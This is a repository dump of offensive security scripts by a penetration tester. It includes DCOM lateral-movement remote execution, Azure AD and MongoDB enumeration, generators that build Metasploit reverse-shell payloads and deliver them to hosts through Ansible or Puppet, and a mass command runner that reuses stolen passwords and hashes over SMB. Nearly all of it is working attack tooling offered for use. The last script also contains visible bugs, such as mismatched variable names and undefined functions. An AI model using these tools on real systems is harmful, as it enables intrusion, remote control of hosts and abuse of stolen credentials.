├── README.md ├── Invoke-MMC20RCE.ps1 ├── AzureADEnumerator.ps1 ├── mongodb_noauth.py ├── pwnsible.sh ├── pwnpet.sh └── cmeMassCommand.py /README.md: -------------------------------------------------------------------------------- 1 | # Random-Hacking-Scripts 2 | A collection of scripts made duing my personal research 3 | -------------------------------------------------------------------------------- /Invoke-MMC20RCE.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-MMC20RCE { 2 | <# 3 | .SYNOPSIS 4 | Research on Lateral movement using MMC20.Application COM Object by Matt "enigma0x3" Nelson 5 | A simple implementation by Tanoy "n0tty" Bose 6 | .Description 7 | https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ 8 | .Parameter IP 9 | Specify the target IP address. 10 | .Parameter CMD 11 | Specify the command that needs to be executed. 12 | .Parameter PARAMS 13 | Additional parameters that 14 | .Example 15 | Invoke-MMC20RCE -ip 127.0.0.1 -cmd cmd.exe -params "if any parameters required" 16 | Invoke-MMC20RCE -ip 127.0.0.1 -cmd "C:\Windows\System32\cmd.exe" -params "if any parameters required" 17 | #> 18 | 19 | param( 20 | [Parameter(Mandatory=$true)] 21 | [String] 22 | $IP, 23 | [Parameter(Mandatory=$true)] 24 | [String] 25 | $cmd, 26 | [Parameter(Mandatory=$false)] 27 | [String] 28 | $params 29 | ) 30 | 31 | $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application",$IP)) 32 | $com.Document.ActiveView.ExecuteShellCommand($cmd,$null,$params,"7") 33 | } 34 | 35 | -------------------------------------------------------------------------------- /AzureADEnumerator.ps1: -------------------------------------------------------------------------------- 1 | # Simple Script made for BalCCon 2k18 2 | # Built by @TanoyBose 3 | 4 | Import-Module AzureAD 5 | Echo 'Prompting for credential.' 6 | $AzureAdCred = Get-Credential 7 | Echo 'Attempting to connect to Azure AD' 8 | Connect-AzureAD -Credential $AzureAdCred 9 | echo "Getting Tenant Details" 10 | Get-AzureADTenantDetail | Export-Csv Get-AzureADTenantDetail.csv 11 | echo "Getting Azure AD domain information" 12 | Get-AzureADDomain | Export-Csv Get-AzureADDomain.csv 13 | echo "Getting Azure AD Directory roles" 14 | Get-AzureADDirectoryRole | Export-Csv Get-AzureADDirectoryRole.csv 15 | #Further Enumeration 16 | #Get-AzureADDirectoryRoleMember -ObjectId "" 17 | echo "Extracting Directory Role" 18 | Get-AzureADDirectoryRole | Select-Object ObjectID | ForEach-Object {$val=$_.psobject.Properties.Value; echo "Extracting directory roles of ObjectID: " $val; Get-AzureADDirectoryRoleMember -ObjectId $val | Out-File Get-AzureADDirectoryRole.txt -Append} 19 | Echo "Extracting all azure ad groups" 20 | Get-AzureADGroup -all 1 | Export-Csv Get-AzureADGroup.csv 21 | echo "Extracting Group Members" 22 | Get-AzureADGroup | Select-Object ObjectID | ForEach-Object {$val=$_.psobject.Properties.Value; echo "Extracting Group members of ObjectID: "$val; Get-AzureADGroupMember -ObjectId $val | Out-File Get-AzureADGroupMember.txt -Append} 23 | echo "Extracting all azure ad users" 24 | Get-AzureADUser -All 1 | Export-Csv Get-AzureADUser.csv 25 | echo "Extracting all azure ad devices" 26 | Get-AzureADDevice -All 1 | Export-Csv Get-AzureADDevice_All.csv 27 | echo "Extracting all azure service principals" 28 | Get-AzureADServicePrincipal -All 1 | Export-Csv Get-AzureADServicePrincipal.csv 29 | -------------------------------------------------------------------------------- /mongodb_noauth.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | 4 | #Greetz 5 | def greet(): 6 | print \ 7 | """ 8 | MongoDB Connector and database names extractor using Python v2.7 by n0tty\n 9 | legendtanoybose@gmail.com 10 | https://github.com/n0tty 11 | 12 | __________ 13 | \\______ \\ ____ ______ ____ 14 | | | _// _ \\/ ___// __ \\ 15 | | | ( <_> )___ \\\\ ___/ 16 | |______ /\\____/____ >\\___ > 17 | \\/ \\/ \\/ 18 | """ 19 | 20 | 21 | greet() 22 | 23 | 24 | #Module start 25 | import pymongo 26 | import time 27 | 28 | print \ 29 | """ 30 | 31 | Reason: 32 | I built this because of unavailability of internet to download the 155+ MB of MongoDB client 33 | on a linux system to generate a PoC during a PenTest 34 | 35 | FYI: 36 | This code has not been tested and probably would not work in Python 3.0+ 37 | This code has been tried and tested on Kali Linux 1.10 and Python version 2.7.3 38 | 39 | """ 40 | 41 | 42 | ip_address=raw_input("Please enter the IP address of the server: ") 43 | 44 | 45 | try: 46 | port=input("Please input the port number (default is 27017): ") 47 | if (port<=1 or port>=65535): 48 | port=27017 49 | print "You have entered an invalid port number and hence default port (27017) has been selected" 50 | except SyntaxError: 51 | print "You have entered an invalid port number and hence default port (27017) has been selected" 52 | port=27017 53 | 54 | databases=[] 55 | 56 | try: 57 | print "Connecting..." 58 | conn = pymongo.Connection(ip_address,port) 59 | print "[+] Connection is Successful" 60 | time.sleep(2) 61 | print "[*] Extracting Database Names" 62 | try: 63 | databases = conn.database_names() 64 | print "[+] Got Database Names successfully" 65 | time.sleep(2) 66 | print "[*] Dumping database names: " 67 | for x in range(0,len(databases)): 68 | print databases[x] 69 | time.sleep(1) 70 | except pymongo.errors,f: 71 | print "Fail to extract databases: %s" % f 72 | except pymongo.errors.ConnectionFailure,e: 73 | print "Failed to connect to the database: %s" % e 74 | 75 | conn.close() 76 | 77 | 78 | -------------------------------------------------------------------------------- /pwnsible.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #!/bin/bash 3 | 4 | # Useful MSF Commands: 5 | # msfvenom --list payloads 6 | # msfvenom --list encoders 7 | # msfvenom --help-formats 8 | # 9 | # You will need metasploit framework installed obviously 10 | 11 | echo "+-------------------------------------------------------------------------+" 12 | echo "| Pwnsible |" 13 | echo "| The payload generator to pwn a ansible infrastructure using msf |" 14 | echo "|http://n0tty.github.io/2017/06/11/Enterprise-Offense-IT-Operations-Part-1|" 15 | echo "+-------------------------------------------------------------------------+" 16 | echo "| Author: Tanoy 'n0tty' Bose |" 17 | echo "+-------------------------------------------------------------------------+" 18 | echo "" 19 | 20 | function helpUsage { 21 | echo "Usage: ./pwnsible.sh " 22 | echo "Example: ./pwnsible.sh linux/x86/meterpreter_reverse_http elf 192.168.56.1 80 ansiblePwner" 23 | } 24 | 25 | function createPayload { 26 | mkdir -p ${5}/ 27 | msfvenom -p ${1} -f ${2} lhost=${3} lport=${4} > ${5}/payload.file 28 | } 29 | 30 | function msfResourceScriptCreator { 31 | echo "Creating metasploit resource script" 32 | touch /tmp/pwnsible.rc 33 | echo use exploit/multi/handler >> /tmp/pwnsible.rc 34 | echo set PAYLOAD ${1} >> /tmp/pwnsible.rc 35 | echo set LHOST 0.0.0.0 >> /tmp/pwnsible.rc 36 | echo set LPORT ${2} >> /tmp/pwnsible.rc 37 | echo set ExitOnSession false >> /tmp/pwnsible.rc 38 | echo exploit -j -z >> /tmp/pwnsible.rc 39 | touch /tmp/msfansible.sh 40 | echo "#!/bin/bash" >> /tmp/msfansible.sh 41 | echo "service postgresql start" >> /tmp/msfansible.sh 42 | echo "msfconsole -r /tmp/pwnsible.rc" >> /tmp/msfansible.sh 43 | chmod +x /tmp/msfansible.sh 44 | echo "Launching Metasploit session" 45 | gnome-terminal -e "bash -c \"/tmp/msfansible.sh; exec bash\"" 46 | } 47 | 48 | function finalInstructions { 49 | echo "Read http://n0tty.github.io/Enterprise-Offense-Ansible-Pwnage before running this script on your client environment" 50 | echo "Instructions:" 51 | echo "The payload has been generated. Now you need to copy the payload file to /etc/ansible/ directory in the ansible server and then run the following commands: " 52 | echo "ansible -m copy -a \"src=/etc/ansible/payload.file dest=/tmp/\" -u root" 53 | echo "ansible -m shell -a \"chmod +x /tmp/payload.file\" -u root" 54 | echo "ansible -m shell -a \"/tmp/payload.file\"" 55 | echo "" 56 | echo "to cleanup just delete /tmp/payload.file from the target " 57 | sleep 20 58 | echo "Initiating local cleanup..." 59 | rm /tmp/msfansible.sh 60 | rm /tmp/pwnsible.rc 61 | echo "Local system cleanup complete" 62 | echo "Remember to delete folder "${1}" from your local system, once your activity has been completed" 63 | 64 | } 65 | 66 | if [ -z ${1} ] & [ -z ${2} ] & [ -z ${3} ] & [ -z ${4} ] & [ -z ${5} ]; 67 | then 68 | helpUsage 69 | else 70 | createPayload ${1} ${2} ${3} ${4} ${5} 71 | msfResourceScriptCreator ${1} ${4} 72 | finalInstructions ${5} 73 | fi 74 | -------------------------------------------------------------------------------- /pwnpet.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Useful MSF Commands: 4 | # msfvenom --list payloads 5 | # msfvenom --list encoders 6 | # msfvenom --help-formats 7 | # 8 | # You will need metasploit framework installed obviously 9 | 10 | echo "+-------------------------------------------------------------------------+" 11 | echo "| Pwnpet |" 12 | echo "| The payload generator to pwn a puppet infrastructure using msf |" 13 | echo "|http://n0tty.github.io/2017/06/11/Enterprise-Offense-IT-Operations-Part-1|" 14 | echo "+-------------------------------------------------------------------------+" 15 | echo "| Author: Tanoy 'n0tty' Bose |" 16 | echo "+-------------------------------------------------------------------------+" 17 | echo "" 18 | 19 | function helpUsage { 20 | echo "Usage: ./pwnpet.sh " 21 | echo "Example: ./pwnpet.sh linux/x86/meterpreter_reverse_http elf 192.168.56.1 80 puppetPwner" 22 | } 23 | 24 | 25 | function createPayload { 26 | echo "Creating Puppet Payloads..." 27 | mkdir -p ${5}/modules/my_file/files/ 28 | mkdir -p ${5}/modules/my_file/manifests/ 29 | mkdir -p ${5}/manifests/ 30 | msfvenom -p ${1} -f ${2} lhost=${3} lport=${4} > ${5}/modules/my_file/files/payload 31 | echo -e "node 'puppetclient' {\ninclude my_file\n}" > ${5}/manifests/site.pp 32 | echo -e "class my_file {\nfile{ '/tmp/payload':\nensure => present,\nsource => 'puppet:///modules/my_file/payload',\nowner => root,\ngroup => root,\nmode => '0777',\n}\nexec {'reverse shell':\ncommand => '/tmp/payload'\n}\n}" > ${5}/modules/my_file/manifests/init.pp 33 | } 34 | 35 | function msfResourceScriptCreator { 36 | echo "Creating metasploit resource script" 37 | touch /tmp/pwnpet.rc 38 | echo use exploit/multi/handler >> /tmp/pwnpet.rc 39 | echo set PAYLOAD ${1} >> /tmp/pwnpet.rc 40 | echo set LHOST 0.0.0.0 >> /tmp/pwnpet.rc 41 | echo set LPORT ${2} >> /tmp/pwnpet.rc 42 | echo set ExitOnSession false >> /tmp/pwnpet.rc 43 | echo exploit -j -z >> /tmp/pwnpet.rc 44 | touch /tmp/msfpuppet.sh 45 | echo "#!/bin/bash" >> /tmp/msfpuppet.sh 46 | echo "service postgresql start" >> /tmp/msfpuppet.sh 47 | echo "msfconsole -r /tmp/pwnpet.rc" >> /tmp/msfpuppet.sh 48 | chmod +x /tmp/msfpuppet.sh 49 | echo "Launching Metasploit session" 50 | gnome-terminal -e "bash -c \"/tmp/msfpuppet.sh; exec bash\"" 51 | } 52 | 53 | function finalInstructions { 54 | echo "Read http://n0tty.github.io/Enterprise-Offense-Puppet-Pwnage before running this script on your client environment" 55 | echo "Instructions:" 56 | echo "Copy the contents of the folder "${1}" into the puppet folder w.r.t the puppet directory structure" 57 | echo "Wait for the puppet clients that pull these configurations to connect to your metasploit server and create session" 58 | echo "For puppet client cleanup, delete the /tmp/payload file" 59 | echo "For puppet server cleanup, delete all the items added by you" 60 | sleep 20 61 | echo "Initiating local cleanup..." 62 | rm /tmp/msfpuppet.sh 63 | rm /tmp/pwnpet.rc 64 | echo "Local system cleanup complete" 65 | echo "Remember to delete folder "${1}" from your local system, once your activity has been completed" 66 | 67 | } 68 | 69 | if [ -z ${1} ] & [ -z ${2} ] & [ -z ${3} ] & [ -z ${4} ] & [ -z ${5} ]; 70 | then 71 | helpUsage 72 | else 73 | createPayload ${1} ${2} ${3} ${4} ${5} 74 | msfResourceScriptCreator ${1} ${4} 75 | finalInstructions ${5} 76 | fi 77 | 78 | -------------------------------------------------------------------------------- /cmeMassCommand.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 2 | 3 | # Mass CrackMapExec command execution script 4 | # v0.1 Utilizes all the compromised non-domain credentials to execute one command on their respective compromised computers and output them. 5 | # The utilized method to execute command is smb on port 445 6 | 7 | # Licensed under BSD 4 Clause License 8 | # Copyleft @TanoyBose 2018 9 | 10 | ''' 11 | Copyright (c) 2018 Tanoy Bose. All rights reserved. 12 | 13 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 14 | 15 | 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 16 | 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 17 | 3. All advertising materials mentioning features or use of this software must display the following acknowledgement: 18 | This product includes software developed by the organization. 19 | 4. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY COPYRIGHT HOLDER "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL COPYRIGHT HOLDER BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 22 | ''' 23 | 24 | import os, subprocess, datetime 25 | 26 | def cmeDomainUserCommandExec(cmeCred,currentTime,cmdExec): 27 | # Still to build this module 28 | pass 29 | 30 | 31 | def cmeCommandExec(cmeCred,currentTime,cmdExec): 32 | cmdExecFilename=cmeCred[1]+"_"+currentTime+"_"+cmdExec+".txt" 33 | if (cmdCred[4]=="plaintext"): 34 | cmeExecCode="cme smb "+cmeCred[1]+" -u "+cmeCred[2]+" -p "+cmeCred[3]+" -x \""+cmdExec+"\"" 35 | elif (cmeCred[4]=="hash"): 36 | cmdExecCode="cme smb "+cmeCred[1]+" -u "+cmeCred[2]+" -H "+cmeCred[3]+" -x \""+cmdExec+"\"" 37 | else: 38 | pass 39 | print "Performing: "+cmeExecCode 40 | execStatus=os.system("timeout 90 "+cmeExecCode+" > "+cmeCred[1]+"/"+cmdExecFilename) 41 | if (not execStatus): 42 | print "[*] Command Executed Successfully!" 43 | print "[*] File Created Successfully!" 44 | 45 | def executeEnumeration(cmecreds,cmdExec): 46 | #iterate through all hosts 47 | currentTimeDT=datetime.datetime.now() 48 | currentTime=currentTimeDT.strftime("%Y%m%d%H%M%S") 49 | for i in cmecreds: 50 | print "[*] Attempting hostname: ",i[1] 51 | # Check if directory present 52 | if (not (i[1].find("..") or i[1].find("/"))): 53 | print "Holy Shit! You almost deleted directories! Looks like you don't know what you are doing. Exiting!" 54 | exit(0) 55 | #directoryCreateStatus=os.system("mkdir "+i[1]) 56 | # Run cmeIpConfig, cmeNetStat 57 | cmeIpconfigHost(i,currentTime) 58 | cmeNetstatHost(i,currentTime) 59 | cmdCommandExec(i,currentTime,cmdExec) 60 | 61 | def loadCredsFromCme(cmeExportedFile,domainAlias,domainFqdn): 62 | print"Loading creds database" 63 | fp = open(cmeExportedFile,"rb") 64 | compromisedList = fp.readlines() 65 | fp.close() 66 | domainCompromisedCreds=[] 67 | weirdCompromisedCreds=[] 68 | workstationCompromisedCreds=[] 69 | 70 | for i in range(0,len(compromisedList)): 71 | eachLineInList = compromisedList[i].split(",") 72 | if (eachLineInList[1] == domainAlias): 73 | domainCompromisedCreds.append(eachLineInList) 74 | elif (eachLineInList[1] == domainFqdn): 75 | domainCompromisedCreds.append(eachLineInList) 76 | elif (eachLineInList[1] == ''): 77 | weirdCompromisedCreds.append(eachLineInList) 78 | else: 79 | workstationCompromisedCreds.append(eachLineInList) 80 | return domainCompromisedCreds,weirdCompromisedCreds,workstationCompromisedCreds 81 | 82 | def main(): 83 | domainFqdn = raw_input("Enter the FQDN: ") 84 | domainAlias = raw_input("Enter the alias: ") 85 | cmeExportedFile = raw_input("Enter the CMEDB Exported CSV filename: ") 86 | cmdExec = raw_input("Enter the command to be executed: ") 87 | domainCompromisedCreds,weirdCompromisedCreds,workstationCompromisedCreds=loadCredsFromCme(cmeExportedFile,domainAlias,domainFqdn) 88 | executeEnumeration(workstationCompromisedCreds,cmdExec) 89 | #print "\ndomain compromised: \n",domainCompromisedCreds 90 | #print "\nweird compromised: \n",weirdCompromisedCreds 91 | #print "\nworkstation compromised: \n",workstationCompromisedCreds 92 | 93 | main() 94 | --------------------------------------------------------------------------------